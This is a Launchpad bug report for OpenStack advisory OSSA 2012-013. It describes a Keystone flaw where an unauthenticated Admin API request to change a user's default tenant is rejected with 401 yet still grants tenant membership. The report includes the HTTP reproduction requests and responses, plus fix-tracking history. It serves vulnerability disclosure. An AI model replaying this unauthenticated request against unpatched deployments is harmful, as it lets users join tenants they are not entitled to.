[OSSA 2012-013] Update user's default tenant partially succeeds without authz
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Identity (keystone) |
Fix Released
|
Critical
|
Dolph Mathews | ||
Essex |
Fix Released
|
Critical
|
Russell Bryant | ||
OpenStack Security Advisory |
Fix Released
|
Undecided
|
Russell Bryant | ||
keystone (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
Bug Description
Attempting to update a user's default tenant using the following API call returns unauthorized as expected, but the user is still granted "membership" on the newly specified tenant.
As a normal user against the Public API:
GET http://
===
X-Auth-Token: cb81c8ba4cb6428
200 OK
======
Vary: X-Auth-Token
Content-Type: application/json
{
"tenants": [
{
"id": "2636bcb347af46
"name": "A"
}
],
"
}
Against the Admin API without an X-Auth-Token:
PUT http://
===
Content-Type: application/json
{
"user": {
"tenantId": "77e165b0670144
}
}
401 Not Authorized
===
Vary: X-Auth-Token
Content-Type: application/json
{
"error": {
"message": "The request you have made requires authentication.",
"code": 401,
"title": "Not Authorized"
}
}
And the first call repeated (again, as the user in question against the Public API):
GET http://
===
X-Auth-Token: cb81c8ba4cb6428
200 OK
======
Vary: X-Auth-Token
Content-Type: application/json
{
"tenants": [
{
"id": "2636bcb347af46
"name": "A"
},
{
"id": "77e165b0670144
"name": "B"
}
],
"
}
Note that the user's default tenant is not actually updated.
Related branches
- Ubuntu Server Developers: Pending requested
-
Diff: 13 lines (+6/-0)1 file modifieddebian/changelog (+6/-0)
CVE References
tags: | added: essex-backport |
Changed in keystone: | |
status: | In Progress → Fix Committed |
visibility: | private → public |
Changed in keystone (Ubuntu): | |
status: | New → Triaged |
Changed in keystone: | |
status: | Fix Committed → Fix Released |
Changed in keystone: | |
milestone: | folsom-rc1 → 2012.2 |
summary: |
- Update user's default tenant partially succeeds without authz + [OSSA 2012-013] Update user's default tenant partially succeeds without + authz |
Changed in ossa: | |
assignee: | nobody → Russell Bryant (russellb) |
status: | New → Fix Released |
So the impact is that you can add yourself (or anyone) as a member of any tenant ? Eek.
Please post patches here and not on gerrit, looks like we'll have to embargo this one.